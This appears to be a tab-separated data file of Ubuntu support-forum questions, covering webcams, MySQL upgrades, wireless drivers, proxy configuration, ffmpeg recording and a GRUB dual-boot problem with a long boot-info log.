433097	how to get macbook air 6.2 webcam to work in ubuntu 13.10	i just installed ubuntu on my macbook air 6.2 and i am wondering if there is anyone that has got the new webcam in macbook air 6.2 to work ? it seems like apple has changed a lot since the last macbook air .
433102	mysql can not start when upgrade 5.5 to 5.6	i following this link to upgrade my mysql , https : //rtcamp.com/tutorials/mysql/mysql-5-6-ubuntu-12-04/ the article ubuntu is x64 , but my ubuntu is x32 , so i change the download link to http : //cdn.mysql.com/downloads/mysql-5.6/mysql-5.6.16-debian6.0-i686.deb when i finish install , when i type this following command to start mysql : $ service mysql.server start it alert me : starting mysql . * the server quit without updating pid file ( /var/run/mysqld/mysqld.pid ) . when i try to type service mysql-server restart , it alert me a little deferent : * mysql server pid file could not be found ! starting mysql . * the server quit without updating pid file ( /var/run/mysqld/mysqld.pid ) . there is something maybe help : my.cnf is location at /etc/mysql/my.cnf ps aux | grep mysql will show different pid when tpye ps aux | grep mysql again edit : /var/run/mysqld directory is empty : /var/run/mysqld # ls -al total 0 drwxr-xr-x 2 mysql root 40 mar 12 13:35 . drwxr-xr-x 17 root root 620 mar 12 13:41 ..
433107	wireless and lan drivers are not supporting in asus x55c new laptop	i bought a new asus x55c laptop with dos system but while installing ubuntu 12.04 i deleted the dos system and installed a fresh ubuntu 12.04 linux . after installing the ubuntu i got to know that wifi , lan , bluetooth drivers are not supporting and also the f1-f12 keys are also not supporting . after this i tried to install other linuxes but no linux is supporting all these drivers . can anyone suggest me an answer of this problem . thanks
433109	how to prevent the recorded video using ffmpeg get corrupt	actually i have an device that record the audio and video . when the recording is started the video file also started to persist into the hard drive . but if device goes off unfortunately between the recording . the video file get corrupted and gives an error : this file not contain playable stream i am using the ubuntu system and record the video using ffmpeg any one can help me.. ! ! ! i am using the webcam for recording the video and bluetooth mic for audio using the ffmpeg . following are the command that i am using to store the audio and video recording on other device ( hard drive ) : ffmpeg -loglevel warning -y -i /home/prakash/../../output/2013-10-07t22-39-05/right_cam.mp4 -i /home/prakash/../.. output/2013-10-07t22-39-05/left_cam.mp4 -filter_complex ' [ 1:0 ] pad=108:28:5:2 : black [ padvidleft ] ; [ 0:0 ] setpts=pts+0.8786787543577881/tb [ right_cam_pts ] ; [ padvidleft ] [ right_cam_pts ] overlay=544:0 [ mergedvid ] ; [ 1:2 ] channelsplit [ ll ] [ lr ] ; [ ll ] [ lr ] amix [ leftmix ] ; [ 1:3 ] channelsplit [ rl ] [ rr ] ; [ rl ] [ rr ] amix [ rightmix ] ; [ leftmix ] [ rightmix ] amix [ cam_all ] ; [ 1:4 ] channelsplit [ btl ] [ btr ] ; [ btl ] [ btr ] amix [ btmix ] ; [ btmix ] [ cam_all ] join [ bt_mixcam ] ' -f mp4 -crf 20 -r 24 -pix_fmt yuv420p -vcodec libx264 -vprofile baseline -map [ mergedvid ] -map [ bt_mixcam ] -map 1:2 -map 1:3 -map 1:4 /home/prakash/../../output/combos/combo-2013-10-07t22-39-05_dgrt6546533w471567f880abf287a855c_1088x288.mp4 if the recording is started and in the middle we turns off the recording device the recorded video and audio get persisted on hard drive but it is not able to play . when we try to play this recording the vlc gives the error this files contains no playable stream
433113	how to remove temp files with a command other then `` apt-get autoremove '' ?	i have ubuntu 12.04 lts . i want to know that if there is a command other than : sudo apt-get autoremove to remove temp files ?
433115	unable to use proxy in terminal despite apt.conf file	i use a wired lan at my college which uses proxy . as per this answer i edited my apt.conf file . my proxy details are as follows username : mahe\ict.student password : mumit @ 123 proxy host : 172.16.19.10 port : 80 this is my apt.conf file . acquire : :http : :proxy `` http : //mahe % 5cict % 2estudent : mumit % 40123 @ 172.16.19.10:80/ '' ; acquire : :https : :proxy `` https : //mahe % 5cict % 2estudent : mumit % 40123 @ 172.16.19.10:80/ '' ; acquire : :ftp : :proxy `` ftp : //mahe % 5cict % 2estudent : mumit % 40123 @ 172.16.19.10:80/ '' ; i still get the same 407 proxy authentication error . i posted my details here because i read that there are issues with proxy authentication where username/password contain special characters like @ . is there anything wrong in the configuration above ? how do i use the proxy on the terminal ?
433118	header files missing	i 'm trying to compile a source code and i 'm getting many errors indicating that header files are missing from my system checking sys/ioccom.h usability ... no checking sys/ioccom.h presence ... no checking for sys/ioccom.h ... no checking sys/sockio.h usability ... no checking sys/sockio.h presence ... no checking for sys/sockio.h ... no checking for net/pfvar.h ... no checking for linux/wireless.h ... no checking bluetooth/bluetooth.h usability ... no checking bluetooth/bluetooth.h presence ... no checking for bluetooth/bluetooth.h ... no so , i 'm starting to think i 'm missing some important packages can you list them for me ? i have ubuntu 12.04 lts , 2.6.28-17 kernel and gcc version 4.6.3 and i 'm trying to compile this package http : //nrg.cs.ucl.ac.uk/mptcp/mptcp_userland_0.1.tar.gz thanks in advance
433122	a command to add a customized icon or symbol to plasma 's default panel	is there a command , that can add/remove a simple icon in kde environment tray or anywhere in plasma 's panel ( taskbar ) ? i need a customized notification icon or any other persistent symbol which shows a customized condition is on or off . ( for me , it will show whether a network cable traffic is limited or is free )
433123	improve performance etc for full-disk-encrypted drives	i have an old laptop ( amd a6-3420m apu ) running ubuntu 13.10 in wubi . on this laptop i use virtualbox to run an an ubuntu 12.04 vm . the ubuntu 12.04 image has full disk encryption and home folder encryption . it is , predictably , slow . is there anything i can tweak to make it faster ? e.g . turn off atime or relatime ? and where do i tweak ? - in the vm , virtualbox settings , host ubuntu or where ?
433127	wifi connected . but no internet	i 'm using lubuntu dual booted with windows 8 . i have an acer aspire v3 laptop . i installed alternative wireless driver broadcom 802.11 linux sta wireless using additional drivers . now i can connect to a wireless network , but ca n't go to internet . here 's the output for ifconfig amila @ amila-aspire-v3-471 : ~ $ ifconfig eth0 link encap : ethernet hwaddr 08:9e:01:5b : c1:03 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr 08 : ed : b9 : ff:96 : f7 inet addr:10.40.18.137 bcast:10.40.18.255 mask:255.255.255.0 inet6 addr : fe80 : :aed : b9ff : feff:96f7/64 scope : link up broadcast running multicast mtu:9000 metric:1 rx packets:15393 errors:0 dropped:0 overruns:0 frame:49457 tx packets:1642 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1208006 ( 1.2 mb ) tx bytes:162202 ( 162.2 kb ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:615 errors:0 dropped:0 overruns:0 frame:0 tx packets:615 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:71108 ( 71.1 kb ) tx bytes:71108 ( 71.1 kb ) and also ping works for google.com . amila @ amila-aspire-v3-471 : ~ $ amila @ amila-aspire-v3-471 : ~ $ ping google.com ping google.com ( 192.248.3.243 ) 56 ( 84 ) bytes of data . 64 bytes from 192.248.3.243 : icmp_seq=1 ttl=60 time=43.5 ms 64 bytes from 192.248.3.243 : icmp_seq=2 ttl=60 time=5.83 ms 64 bytes from 192.248.3.243 : icmp_seq=3 ttl=60 time=5.87 ms 64 bytes from 192.248.3.243 : icmp_seq=4 ttl=60 time=5.86 ms 64 bytes from 192.248.3.243 : icmp_seq=5 ttl=60 time=6.11 ms 64 bytes from 192.248.3.243 : icmp_seq=6 ttl=60 time=7.10 ms 64 bytes from 192.248.3.243 : icmp_seq=7 ttl=60 time=21.7 ms 64 bytes from 192.248.3.243 : icmp_seq=8 ttl=60 time=7.51 ms 64 bytes from 192.248.3.243 : icmp_seq=9 ttl=60 time=8.48 ms 64 bytes from 192.248.3.243 : icmp_seq=10 ttl=60 time=5.93 ms 64 bytes from 192.248.3.243 : icmp_seq=11 ttl=60 time=103 ms 64 bytes from 192.248.3.243 : icmp_seq=12 ttl=60 time=5.96 ms 64 bytes from 192.248.3.243 : icmp_seq=13 ttl=60 time=19.0 ms ^c -- - google.com ping statistics -- - 13 packets transmitted , 13 received , 0 % packet loss , time 12018ms rtt min/avg/max/mdev = 5.832/18.954/103.372/26.513 ms is this a problem with dns ? ? i have less knowledge in linux . i tried connecting using school wifi network . is there a problem in proxy ? i tried to set manual proxy in firefox . but still ca n't go to internet . how to connect to internet anybody help plzâś
433128	getting error on mcafee installation - dependency problem	selecting previously unselected package mavl : i386 . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 179068 files and directories currently installed . ) unpacking mavl : i386 ( from ... /mavl-3.1.0-0.i386.deb ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory dpkg : dependency problem prevent configuration of mavl : i386 : mavl : i386 depends on dkms . dpkg : error processing mavl : i386 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : mavl : i386
433130	which version of ubuntu to install : 12.04 lts or 13.10 ?	i just bought an acer aspire v3-571g / 15.6 '' ips full hd / intel® core™ i3-3110m / 6 gb / 500 gb / nvidia® geforce® gt 730m 2 gb / dvd+/-rw / usb 3.0 / hdmi / with bootable linux installed . i would like to install a 64 bit version of ubuntu . i am considering versions 12.04 lts and 13.10 ? which version has newer and a more complete list of drivers and less compatibility problems . i searched the forum and understand that i will probably have problems with wifi , bluetooth , nvidia drivers , screen brightness adjustment , sdcard . when it comes to getting the computer working will there be a difference between versions or will i have to solve these problems manually ? i am totaly new user of linux and ubuntu ( never used it before ) . thank you .
433131	ubuntu 12.04 no network devices available	i 've just installed 12.04 in a dual boot with windows 8 via a usb . the important point is that my laptop does n't have an ethernet . when i booted to the usb , wireless networking worked . now that i 've installed 12.04 on a partition on the hard drive i ca n't get wireless networking to work . any suggestions on how i should fix this ? the output of sudo lshw -c network is : *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 6b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : b2500000-b2501fff
433136	sublime text 2 not saving preferences	i recently installed sublime text 2 on my ubuntu 12.04 . the problem is that whenever i open it , by default it opens up to two files : sublime.desktop and defaults.list . also , whatever preferences i try to set are n't saved and i always get the default configuration ( with these two files opened ) every time i start it up . this was n't the case with sublime text 1 . it used to save my preferences and open on my last opened files . why is this happening ? how can i make it save my preferences as sublime text 1 did ?
433141	windows 8 not showing up after installing ubuntu alongside windows	okay so i installed ubuntu on my system which had windows 8 pre-installed ( old comp so i 'm sort sure it did n't have secure boot and uefi ) . i used the `` install alongside windows '' option which promised to keep my windows untouched . the install went normal . and now , grub does not show up windows . things i 've tried : 1 ) using os-prober 2 ) using grub update ( does not detect windows ) 3 ) using boot-repair my best guess : it installed efi ubuntu alongside my legacy windows 8 . how do i solve this ? here is my bootinfo script : boot info script e7fc706 + boot-repair extra info [ boot-info 23dec2013 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 137390080 of the same hard drive for core.img . core.img is at this location and looks in partition 94 for . sda1 : __________________________________________________________________________ file system : vfat boot sector type : unknown boot sector info : according to the info in the boot sector , sda1 starts at sector 0 . but according to the info from fdisk , sda1 starts at sector 40 . operating system : boot files : sda2 : __________________________________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' sda3 : __________________________________________________________________________ file system : bios boot partition boot sector type : grub2 's core.img boot sector info : sda4 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 13.10 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/i386-pc/core.img sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 312,581,807 312,581,807 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 40 409,639 409,600 efi system partition /dev/sda2 69,031,936 137,390,079 68,358,144 data partition ( windows/linux ) /dev/sda3 137,390,080 137,392,127 2,048 bios boot partition /dev/sda4 137,392,128 304,201,727 166,809,600 data partition ( linux ) /dev/sda5 304,201,728 312,580,095 8,378,368 swap partition ( linux ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 70d6-1701 vfat efi /dev/sda4 d8d9a2a4-42ce-464d-af78-7df319226b3b ext4 /dev/sda5 a5c85f7b-91c2-4aae-8c41-86d33b6ad88b swap ================================ mount points : ================================= device mount_point type options /dev/sda4 / ext4 ( rw , errors=remount-ro ) =========================== sda4/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 d8d9a2a4-42ce-464d-af78-7df319226b3b else search -- no-floppy -- fs-uuid -- set=root d8d9a2a4-42ce-464d-af78-7df319226b3b fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_in insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-d8d9a2a4-42ce-464d-af78-7df319226b3b ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 d8d9a2a4-42ce-464d-af78-7df319226b3b else search -- no-floppy -- fs-uuid -- set=root d8d9a2a4-42ce-464d-af78-7df319226b3b fi linux /boot/vmlinuz-3.11.0-12-generic root=uuid=d8d9a2a4-42ce-464d-af78-7df319226b3b ro persistent quiet splash $ vt_handoff initrd /boot/initrd.img-3.11.0-12-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-d8d9a2a4-42ce-464d-af78-7df319226b3b ' { menuentry 'ubuntu , with linux 3.11.0-12-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-12-generic-advanced-d8d9a2a4-42ce-464d-af78-7df319226b3b ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 d8d9a2a4-42ce-464d-af78-7df319226b3b else search -- no-floppy -- fs-uuid -- set=root d8d9a2a4-42ce-464d-af78-7df319226b3b fi echo 'loading linux 3.11.0-12-generic ... ' linux /boot/vmlinuz-3.11.0-12-generic root=uuid=d8d9a2a4-42ce-464d-af78-7df319226b3b ro persistent quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-12-generic } menuentry 'ubuntu , with linux 3.11.0-12-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-12-generic-recovery-d8d9a2a4-42ce-464d-af78-7df319226b3b ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 d8d9a2a4-42ce-464d-af78-7df319226b3b else search -- no-floppy -- fs-uuid -- set=root d8d9a2a4-42ce-464d-af78-7df319226b3b fi echo 'loading linux 3.11.0-12-generic ... ' linux /boot/vmlinuz-3.11.0-12-generic root=uuid=d8d9a2a4-42ce-464d-af78-7df319226b3b ro recovery nomodeset persistent echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-12-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 d8d9a2a4-42ce-464d-af78-7df319226b3b else search -- no-floppy -- fs-uuid -- set=root d8d9a2a4-42ce-464d-af78-7df319226b3b fi linux16 /boot/memtest86+.bin } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_gpt insmod ext2 set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 d8d9a2a4-42ce-464d-af78-7df319226b3b else search -- no-floppy -- fs-uuid -- set=root d8d9a2a4-42ce-464d-af78-7df319226b3b fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda4/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda4 during installation uuid=d8d9a2a4-42ce-464d-af78-7df319226b3b / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=a5c85f7b-91c2-4aae-8c41-86d33b6ad88b none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda4 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda1 00000000 eb 58 90 42 53 44 20 20 34 2e 34 00 02 01 20 00 |.x.bsd 4.4 ... .| 00000010 02 00 00 00 00 f0 00 00 20 00 10 00 00 00 00 00 | ... ... .. ... ... .| 00000020 00 40 06 00 4f 0c 00 00 00 00 00 00 02 00 00 00 | . @ ..o ... ... ... ..| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 00 00 29 01 17 d6 70 45 46 49 20 20 20 20 20 20 |.. ) ... pefi | 00000050 20 20 46 41 54 33 32 20 20 20 fa 31 c0 8e d0 bc | fat32 .1 ... .| 00000060 00 7c fb 8e d8 e8 00 00 5e 83 c6 19 bb 07 00 fc |.| ... ... ^ ... ... .| 00000070 ac 84 c0 74 06 b4 0e cd 10 eb f5 30 e4 cd 16 cd | ... t ... ... .0 ... .| 00000080 19 0d 0a 4e 6f 6e 2d 73 79 73 74 65 6d 20 64 69 | ... non-system di| 00000090 73 6b 0d 0a 50 72 65 73 73 20 61 6e 79 20 6b 65 |sk..press any ke| 000000a0 79 20 74 6f 20 72 65 62 6f 6f 74 0d 0a 00 00 00 |y to reboot ... ..| 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 unknown bootloader on sda2 00000000 a4 36 ac 36 b4 36 bc 36 c4 36 cc 36 d4 36 dc 36 |.6.6.6.6.6.6.6.6| 00000010 e4 36 ec 36 f4 36 fc 36 04 37 0c 37 14 37 1c 37 |.6.6.6.6.7.7.7.7| 00000020 24 37 2c 37 34 37 3c 37 44 37 4c 37 54 37 5c 37 | $ 7,747 < 7d7l7t7\7| 00000030 64 37 6c 37 74 37 7c 37 84 37 8c 37 94 37 9c 37 |d7l7t7|7.7.7.7.7| 00000040 a4 37 ac 37 b4 37 bc 37 c4 37 cc 37 d4 37 dc 37 |.7.7.7.7.7.7.7.7| 00000050 e4 37 ec 37 f4 37 fc 37 04 38 0c 38 14 38 1c 38 |.7.7.7.7.8.8.8.8| 00000060 24 38 2c 38 34 38 3c 38 44 38 4c 38 54 38 5c 38 | $ 8,848 < 8d8l8t8\8| 00000070 64 38 6c 38 74 38 7c 38 84 38 8c 38 94 38 9c 38 |d8l8t8|8.8.8.8.8| 00000080 a4 38 ac 38 b4 38 bc 38 c4 38 cc 38 d4 38 dc 38 |.8.8.8.8.8.8.8.8| 00000090 e4 38 ec 38 f4 38 fc 38 04 39 0c 39 14 39 1c 39 |.8.8.8.8.9.9.9.9| 000000a0 24 39 2c 39 34 39 3c 39 44 39 4c 39 54 39 5c 39 | $ 9,949 < 9d9l9t9\9| 000000b0 64 39 6c 39 74 39 7c 39 84 39 8c 39 94 39 9c 39 |d9l9t9|9.9.9.9.9| 000000c0 a4 39 ac 39 b4 39 bc 39 c4 39 cc 39 d4 39 dc 39 |.9.9.9.9.9.9.9.9| 000000d0 e4 39 ec 39 f4 39 fc 39 04 3a 0c 3a 14 3a 1c 3a |.9.9.9.9. : . : . : . : | 000000e0 24 3a 2c 3a 34 3a 3c 3a 44 3a 4c 3a 54 3a 5c 3a | $ : ,:4 : < : d : l : t : \ : | 000000f0 64 3a 6c 3a 74 3a 7c 3a 84 3a 8c 3a 94 3a 9c 3a |d : l : t : | : . : . : . : . : | 00000100 a4 3a ac 3a b4 3a bc 3a c4 3a cc 3a d4 3a dc 3a |. : . : . : . : . : . : . : . : | 00000110 e4 3a ec 3a f4 3a fc 3a 04 3b 0c 3b 14 3b 1c 3b |. : . : . : . : . ; . ; . ; . ; | 00000120 24 3b 2c 3b 34 3b 3c 3b 44 3b 4c 3b 54 3b 5c 3b | $ ; , ; 4 ; < ; d ; l ; t ; \ ; | 00000130 64 3b 6c 3b 74 3b 7c 3b 84 3b 8c 3b 94 3b 9c 3b |d ; l ; t ; | ; . ; . ; . ; . ; | 00000140 a4 3b ac 3b b4 3b bc 3b c4 3b cc 3b d4 3b dc 3b |. ; . ; . ; . ; . ; . ; . ; . ; | 00000150 e4 3b ec 3b f4 3b fc 3b 04 3c 0c 3c 14 3c 1c 3c |. ; . ; . ; . ; . < . < . < . < | 00000160 24 3c 2c 3c 34 3c 3c 3c 44 3c 4c 3c 54 3c 5c 3c | $ < , < 4 < < < d < l < t < \ < | 00000170 64 3c 6c 3c 74 3c 7c 3c 84 3c 8c 3c 94 3c 9c 3c |d < l < t < | < . < . < . < . < | 00000180 a4 3c ac 3c b4 3c bc 3c c4 3c cc 3c d4 3c dc 3c |. < . < . < . < . < . < . < . < | 00000190 e4 3c ec 3c f4 3c fc 3c 04 3d 0c 3d 14 3d 1c 3d |. < . < . < . < .=.=.=.=| 000001a0 24 3d 2c 3d 34 3d 3c 3d 44 3d 4c 3d 54 3d 5c 3d | $ = , =4= < =d=l=t=\=| 000001b0 64 3d 6c 3d 74 3d 7c 3d 84 3d 8c 3d 94 3d 9c 3d |d=l=t=|=.=.=.=.=| 000001c0 a4 3d ac 3d b4 3d bc 3d c4 3d cc 3d d4 3d dc 3d |.=.=.=.=.=.=.=.=| 000001d0 e4 3d ec 3d f4 3d fc 3d 04 3e 0c 3e 14 3e 1c 3e |.=.=.=.=. > . > . > . > | 000001e0 24 3e 2c 3e 34 3e 3c 3e 44 3e 4c 3e 54 3e 5c 3e | $ > , > 4 > < > d > l > t > \ > | 000001f0 64 3e 6c 3e 74 3e 7c 3e 84 3e 8c 3e 94 3e 9c 3e |d > l > t > | > . > . > . > . > | 00000200 =============================== stderr messages : =============================== cat : /tmp/bootinfo-z3xyfcre/tmp_log : no such file or directory additional information : =================== log of boot-repair 2014-03-12__16h16 =================== boot-repair version : 3.199~ppa40~saucy boot-sav version : 3.199~ppa40~saucy glade2script version : 3.2.2~ppa47~saucy boot-sav-extra version : 3.199~ppa40~saucy boot-repair is executed in installed-session ( ubuntu 13.10 , saucy , ubuntu , x86_64 ) cpu op-mode ( s ) : 32-bit , 64-bit boot_image=/boot/vmlinuz-3.11.0-12-generic root=uuid=d8d9a2a4-42ce-464d-af78-7df319226b3b ro persistent quiet splash warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . =================== os-prober : /dev/sda4 : the os now in use - ubuntu 13.10 currentsession : linux =================== blkid : /dev/sda1 : label= '' efi '' uuid= '' 70d6-1701 '' type= '' vfat '' /dev/sda4 : uuid= '' d8d9a2a4-42ce-464d-af78-7df319226b3b '' type= '' ext4 '' /dev/sda5 : uuid= '' a5c85f7b-91c2-4aae-8c41-86d33b6ad88b '' type= '' swap '' 1 disks with os , 1 os : 1 linux , 0 macos , 0 windows , 0 unknown type os . warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util sfdisk does n't support gpt . use gnu parted . warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . =================== /etc/grub.d/ : drwxr-xr-x 2 root root 4096 oct 17 00:32 grub.d total 72 -rwxr-xr-x 1 root root 7850 oct 10 23:18 00_header -rwxr-xr-x 1 root root 5949 aug 15 2013 05_debian_theme -rwxr-xr-x 1 root root 11479 oct 10 23:18 10_linux -rwxr-xr-x 1 root root 10258 oct 10 23:18 20_linux_xen -rwxr-xr-x 1 root root 1798 jun 17 2013 20_memtest86+ -rwxr-xr-x 1 root root 11531 oct 10 23:18 30_os-prober -rwxr-xr-x 1 root root 1426 oct 10 23:18 30_uefi-firmware -rwxr-xr-x 1 root root 214 oct 10 23:18 40_custom -rwxr-xr-x 1 root root 216 oct 10 23:18 41_custom -rw-r -- r -- 1 root root 483 oct 10 23:18 readme =================== /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release 